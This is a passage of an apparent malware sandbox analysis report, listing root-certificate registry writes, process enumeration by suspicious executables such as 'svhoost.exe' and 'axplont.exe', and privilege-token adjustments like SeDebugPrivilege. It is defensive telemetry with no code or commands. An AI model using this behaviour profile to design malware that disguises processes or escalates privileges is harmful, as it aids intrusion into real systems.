499ed77ab3871a2533bc6d08470203010001300d06092a864886f70d010104050003818100505bc56b6f8d525b0dc9bdac347398ca0a87caae4c4aba14a4eb52709521e0b5a1604ef743025101af1e3a70cebf18b686289967eb08e897405c1682fdb825fb366f6f763ec54c8ee2a751facac163ba5e8324470b9372f6449acea7953a8f50109e1db15916abcf3edf838bc7fac36bdc649f402b1f452404ae492ff6df0c91 C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8250BED5A214433A66377CBC10EF83F669DA3A67 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5F4E1FCF31B7913B850B54F6E5FF501A2B6FC6CF\Blob = 0300000001000000140000005f4e1fcf31b7913b850b54f6e5ff501a2b6fc6cf09000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703090b000000010000001c0000004b00490053004100200052006f006f00740043004100200033000000200000000100000056050000308205523082043aa003020102020102300d06092a864886f70d01010505003064310b3009060355040613024b52310d300b060355040a13044b495341312e302c060355040b13254b6f7265612043657274696669636174696f6e20417574686f726974792043656e7472616c311630140603550403130d4b49534120526f6f7443412033301e170d3034313131393036333935315a170d3134313131393036333935315a3064310b3009060355040613024b52310d300b060355040a13044b495341312e302c060355040b13254b6f7265612043657274696669636174696f6e20417574686f726974792043656e7472616c311630140603550403130d4b49534120526f6f744341203330820120300d06092a864886f70d01010105000382010d00308201080282010100debaed1765aed1bd4a3dacdb8072cc58e1e7e193dacc307acfef0bae2da743abbfa742cf085608a4471d7dfa86efd830972634613c800ef8d4eb9ffc22301ba16d3ee34cd2554e164037c2f6076edb07b5a58c9681e29b5c7e9461c8ce843cb1fa00e672d3098577e9dc5e214fb4e44ef4e217ab50af1cffa13958755b12b296b98df07062485b56282aa5879136b91e24f5b9ba7bb652515b175a60056c9cc2e6c68c3ef9eadd3c8cff89de4370ac1db8f175cd38ca530d47686ac63c18cabde1b4be0ef4d0e3d213fab0511111d441abe8f4398ee134844f0b93aa6a38fce5c67847ae7617faa1803706001508fd6b238efa720d95d64b62b168c2dd349b5d020103a382020f3082020b301f0603551d230418301680148f81f0daa6cd743cbe66f4156b46a4fe0628ccaa301d0603551d0e041604148f81f0daa6cd743cbe66f4156b46a4fe0628ccaa300e0603551d0f0101ff0404030201063082012e0603551d2004820125308201213082011d0604551d200030820113303006082b060105050702011624687474703a2f2f7777772e726f6f7463612e6f722e6b722f7263612f6370732e68746d6c3081de06082b060105050702023081d11e81cec7740020c778c99dc11cb2940020acf5c778c778c99dc11cc785b2c8b2e4002800540068006900730020006300650072007400690066006900630061007400650020006900730020006100630063007200650064006900740065006400200075006e00640065007200200045006c0065006300740072006f006e006900630020005300690067006e0061007400750072006500200041006300740020006f00660020007400680065002000520065007000750062006c006900630020006f00660020004b006f007200650061002930330603551d11042c302aa42830263124302206035504030c1bed959ceab5adeca095ebb3b4ebb3b4ed98b8eca784ed9da5ec9b9030330603551d12042c302aa42830263124302206035504030c1bed959ceab5adeca095ebb3b4ebb3b4ed98b8eca784ed9da5ec9b90300f0603551d130101ff040530030101ff300c0603551d2404053003800100300d06092a864886f70d01010505000382010100cfd6f70efdb08c6e05158ea85c2bb25ad11e57a65e18aa821108fc99b75ba7e3c8d2a2d3f92434f7e3e4ae895447d36949c980c111ebe229c7f6068b5fbae25ecfabc3cecfee9225dc9f391e0e03f4de905ba170995cc7734ec9a475497b25a19f82928d4dec61c50c32a7c7383880553a2a831d9c6479b90da7354a68ef8fff05d8ba4e5661d8f84a7098089693d860c73aec5f9f1d2b354f4814a19abb6feed2038653f110c70754625e368ee21c2b1d174de6f55aef8aba82e877d928117e37874a940ac940e935a53afb643ef25f167af376d7ceee3f441d45aa5f11aa531c3a1f525162540fa39035cf4d6fbac7be2c09f135f801bb24dd30bc480feed9 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070308060a2b0601040182370a030406082b0601050507030606082b06010505070307030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D2441AA8C203AECAA96E501F124D52B68FE4C375\Blob = 0b000000010000005200000049002e00430041002000132020005100750061006c00690066006900650064002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079000000090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070308060a2b0601040182370a030406082b0601050507030606082b06010505070307030000000100000014000000d2441aa8c203aecaa96e501f124d52b68fe4c3752000000001000000220500003082051e30820406a003020102020400a037a0300d06092a864886f70d01010b05003081b7310b300906035504061302435a313a303806035504030c31492e4341202d205175616c69666965642043657274696669636174696f6e20417574686f726974792c2030392f32303039312d302b060355040a0c245072766ec3ad20636572746966696b61c48d6ec3ad206175746f726974612c20612e732e313d303b060355040b0c34492e4341202d20416363726564697465642050726f7669646572206f662043657274696669636174696f6e205365727669636573301e170d3039303930313030303030305a170d3139303930313030303030305a3081b7310b300906035504061302435a313a303806035504030c31492e4341202d205175616c69666965642043657274696669636174696f6e20417574686f726974792c2030392f32303039312d302b060355040a0c245072766ec3ad20636572746966696b61c48d6ec3ad206175746f726974612c20612e732e313d303b060355040b0c34492e4341202d20416363726564697465642050726f7669646572206f662043657274696669636174696f6e20536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100b53684cb4282f0cf65e2549a58732ce3eb155752f0cf225888840d782aefd471e6fd8a4621d63f67ae3471e6a792342f217ee6db704ae0e482e8a3bc919600df3a293b3e8614238a5763ef2ee91b73e7368a617a90b1c4bfaa8d03c5b184f6d1df12b09470f0076ca15b3a3b577415803446f37b2e82a427b4a602dcb9e54c66c9a4d3fe033ef68293bd007527fc8061164e24b1cf25612d8bf460b2f42b2674a4813fbf29f70f0bc7bbc32ea90382dd7fcc1adc51699249bec013f04f11e32bc9057521d23a9e51a70615a45ce61fe8649d6b2270f3a6edbb10bbbe20ca36b6e9e381e3411692c67a7a3b77ada35c780df898770fd86c915eec48e4c52401cb0203010001a382012e3082012a300f0603551d130101ff040530030101ff300e0603551d0f0101ff0404030201063081e70603551d200481df3081dc3081d90604551d20003081d03081cd06082b060105050702023081c01a81bd54656e746f20636572746966696b6174206a6520767964616e206a616b6f206b76616c6966696b6f76616e792073797374656d6f767920636572746966696b617420706f646c65207a616b6f6e6120632e203232372f323030302053622e207620706c61746e656d207a6e656e692f54686973206973207175616c69666965642073797374656d206365727469666963617465206163636f7264696e6720746f20437a65636820416374204e6f2e203232372f3230303020436f6c6c2e301d0603551d0e0416041479cbd023e93a677091744fd351e2e020fde128fb300d06092a864886f70d01010b050003820101007d95a536d788586811cf65fb5b0d2ff674818b59d99d49b8f53996c9f0b20f04cc588cfa0432acc047be2dc3de938ba69645ae5674e59a4ba23faa26c42856612405575f99a4c767b01852c9fb41a8f9e4f19e32ce9e1545d95dacfb9edb9bc73c8fafdb4ba223e83b29707118a5f8e387ae21136af4692a590e31b328533a629aac08937ca987b65f5aa618c2d0c2f35d8c6fa73f308938eb94132a485ade79e590cb5ea4b917b66306395fc8366311f4b612cf4876893c6a57f9eb7322f7fa3e05ae3ac0c60e924dcfd48954d11a826a375b9628a8002283ced02ab9b38d53582e655cd5f2db8c0125736c978bfc6001ec4093c1ed51b8aacb62d82530a23d C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\16D86635AF1341CD34799445EB603E273702965D\Blob = 0b0000000100000012000000530049005400480053002000430041000000090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030703000000010000001400000016d86635af1341cd34799445eb603e273702965d2000000001000000650300003082036130820249a00302010202101bd40ed434d1da15a6003015024da46c300d06092a864886f70d01010505003036310b30090603550406130253453111300f060355040a0c08436172656c696e6b3114301206035504030c0b5349544853204341207633301e170d3035313132383130323735305a170d3135313132383036303233385a3036310b30090603550406130253453111300f060355040a0c08436172656c696e6b3114301206035504030c0b534954485320434120763330820122300d06092a864886f70d01010105000382010f003082010a0282010100c5d95bd1d42b7f4067eea15b5dd1da6ab91931f2f026490165fc4154f19691ec2aee0444241e409ce717503fea1c7ceeb83739fcc7d3af9b6e5ddf3ebe05fceacad9f94556e1959cb1d05a8ffec82aa6d76a6ce06d5dec5c76fee199479aa97ba7eae66f5402274d514e283dac063a8182a61cbd4ba4ed5212dc8a2aeb27f4c1224a10845a75b580225665ebcc80f2a5e164be7cde0fbd27074c295baab1efb47bff8734e8a39342cb3d60bb77d3c22f5e14f8736fa47fa09c01d5d5a9bb0c578fccc03b91789e923979324c447fc70b7ddefacc7edaccde0dd466b662a633bf6cf9d5dd47527094cb65e045b70dd7af9548d741a33b20500d3c145593ccea0d0203010001a36b306930120603551d130101ff040830060101ff020100301106096086480186f842010104040302020430140603551d20040d300b300906072a85704a010103300b0603551d0f040403020106301d0603551d0e041604147c2e39233244e80f4e66f20d28fe40bec2b6e2a0300d06092a864886f70d0101050500038201010008535a88290df554d8abb183b927695aaa5f2b5849d4b9df6febc706ebfd879abfca12df7a9e0122256352856fa72f0e9774608ce0488073dd428d21ed0f727f74066e50563b2d87ec81588b36c7ca00fba404b62f38588e77f106c42d2c272d18820b8a5f229414156338c6a5b1bae0acbe3e263f91bb1c83fc0ecac937be37d7f07bf38cd8bc900bf400bf54bc6a4a58e7ca5b0c19534207955735b84f96539aa898dd4e7d55b49ce3bac036b9b7dc0298f8f6e530be2c77b2f3c9e202a3e6f7447cd66a7fd078be3973f80bc21f52000e4d7bc60aee62cb09d50f0a30878293bcca11a41f09fafa3750ec3be23c24a08028ccfba6ddef379aa931dddfea51 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\253F775B0E7797AB645F15915597C39E263631D1\Blob = 030000000100000014000000253f775b0e7797ab645f15915597c39e263631d1090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020b00000001000000240000004200490054002000410064006d0069006e002d0052006f006f0074002d00430041000000200000000100000059050000308205553082043da00302010202043bf381d0300d06092a864886f70d0101050500306c310b3009060355040613026368310e300c060355040a130561646d696e3111300f060355040b1308536572766963657331223020060355040b131943657274696669636174696f6e20417574686f726974696573311630140603550403130d41646d696e2d526f6f742d4341301e170d3031313131353038353130375a170d3231313131303037353130375a306c310b3009060355040613026368310e300c060355040a130561646d696e3111300f060355040b1308536572766963657331223020060355040b131943657274696669636174696f6e20417574686f726974696573311630140603550403130d41646d696e2d526f6f742d434130820122300d06092a864886f70d01010105000382010f003082010a0282010100cbe0af441422fe6a1749f25d9dcf5c02620b80b95abfa855337ba312245e4c6f3b41894e833d9fb3952634a6cc12f4cc9d875e3d0c0d172f85263e2a265973a1a8bc3bebe546b8f3597b20b15e40016dba67b36bebefc5e2f935dd0c6a06b69a289a70b3402976c07146116b43afe55641fbe61c39834db7f6a2b166c9a80db2f077be36c1202732b9ccd75acaf61741364dfbbb5581639c935e836b7fb81577727c7d4d096b5995e6ed30ab4446d91501a55b8965b6e028d92808957e0823b222e8df254c3c68f76ee74bc790fd844126be5c833ad72379b71af80719825a6958c5ff88722bc7bef8d32d3377a71612a88b21c642ae7a64aff2b3c0ed77e4690203010001a38201fd308201f9300f0603551d130101ff040530030101ff3081990603551d2004819130818e30818b06086085740111030100307f302b06082b06010505070202301f1a1d54686973206973207468652041646d696e2d526f6f742d434120435053305006082b060105050702011644687474703a2f2f7777772e696e666f726d6174696b2e61646d696e2e63682f504b492f6c696e6b732f4350535f325f31365f3735365f315f31375f335f315f302e706466307f0603551d1f047830763074a072a070a46e306c311630140603550403130d41646d696e2d526f6f742d434131223020060355040b131943657274696669636174696f6e20417574686f7269746965733111300f060355040b13085365727669636573310e300c060355040a130561646d696e310b3009060355040613026368301d0603551d0e04160414829ffa237320f1978bb24c4dbe42c57f66cd64e83081990603551d2304819130818e8014829ffa237320f1978bb24c4dbe42c57f66cd64e8a170a46e306c310b3009060355040613026368310e300c060355040a130561646d696e3111300f060355040b1308536572766963657331223020060355040b131943657274696669636174696f6e20417574686f726974696573311630140603550403130d41646d696e2d526f6f742d434182043bf381d0300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100784f7a5c2611a72eae9a43ca5c3582467ec8368f7a66b5a932081c0ce46ea1f1c8c1d4e480e78cbd63b10cdff2b93ec20b71406946a36cf45b0f0d2144c72a2b3d1a0bc0a0c1cc88ca1c3fac52b6f667cd4c6dc4be23fd412b046e77a51678e99b5c23cf811a0621636adc2951b23af99bf75db12df50417067f9ce837852dee31bc2e01f8c4eb6b8e34c53939f69498bb1f0e1e112fa88c070a48a28c6a998534b72a6185781a29691f9d25505104ca17c339380771e7d1989bd5d1181596bce2f3c9672bf109b2ce9cf4432601fa576b90a9b1bee835d569fff039154ebc5ff0cf3bf4be233f4566c4b4965dbe8f0ddec76d0942f389f9f13ff5744fdfb865 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\23E833233E7D0CC92B7C4279AC19C2F474D604CA C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob = 1900000001000000100000003fc8cb0bc05241e58d65e9448b2d07c20f00000001000000100000008b3c3087b7056f5ec5ddba91a1b901f069000000010000000e000000300c060a2b0601040182373c03020b00000001000000320000004d006900630072006f0073006f0066007400200052006f006f007400200041007500740068006f0072006900740079000000030000000100000014000000a43489159a520f0d93d032ccaf37e7fe20a8b4191400000001000000140000004a5c7522aa46bfa4089d39974ebdb4a360f7a01d20000000010000001604000030820412308202faa003020102020f00c1008b3c3c8811d13ef663ecdf40300d06092a864886f70d01010405003070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f72697479301e170d3937303131303037303030305a170d3230313233313037303030305a3070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100a902bdc170e63bf24e1b289f97785e30eaa2a98d255ff8fe954ca3b7fe9da2203e7c51a29ba28f60326bd1426479eeac76c954daf2eb9c861c8f9f8466b3c56b7a6223d61d3cde0f0192e896c4bf2d669a9a682699d03a2cbf0cb55826c146e70a3e38962ca92839a8ec498342e3840fbb9a6c5561ac827ca1602d774ce999b4643b9a501c310824149fa9e7912b18e63d986314605805659f1d375287f7a7ef9402c61bd3bf5545b38980bf3aec54944eaefda77a6d744eaf18cc96092821005790606937bb4b12073c56ff5bfba4660a08a6d2815657efb63b5e16817704daf6beae8095feb0cd7fd6a71a725c3ccabcf008a32230b30685c9b320771385df0203010001a381a83081a53081a20603551d0104819a30819780105bd070ef69729e23517e14b24d8effcba1723070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f72697479820f00c1008b3c3c8811d13ef663ecdf40300d06092a864886f70d0101040500038201010095e80bc08df3971835edb80124d87711f35c60329f9e0bcb3e0591888fc93ae621f2f057932cb5a047c862effcd7cc3b3b5aa9365469fe246d3fc9ccaade057cdd318d3d9f10706abbfe124f1869c0fcd043e3115a204fea627bafaa19c82b37252dbe65a1128a250f63a3f7541cf921c9d615f352ac6e433207fd8217f8e5676c0d51f6bdf152c7bde7c430fc203109881d95291a4dd51d02a5f180e003b45bf4b1ddc857ee6549c75254b6b4032812ff90d6f0088f7eb897c5ab372ce47ae4a877e376a000d06a3fc1d2368ae04112a8356a1b6adb35e1d41c04e4a84504c85a33386e4d1c0d62b70aa28cd3d5543f46cd1c55a670db123a8793759fa7d2a0 C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
N/A N/A C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
N/A N/A C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
N/A N/A C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
N/A N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeBackupPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
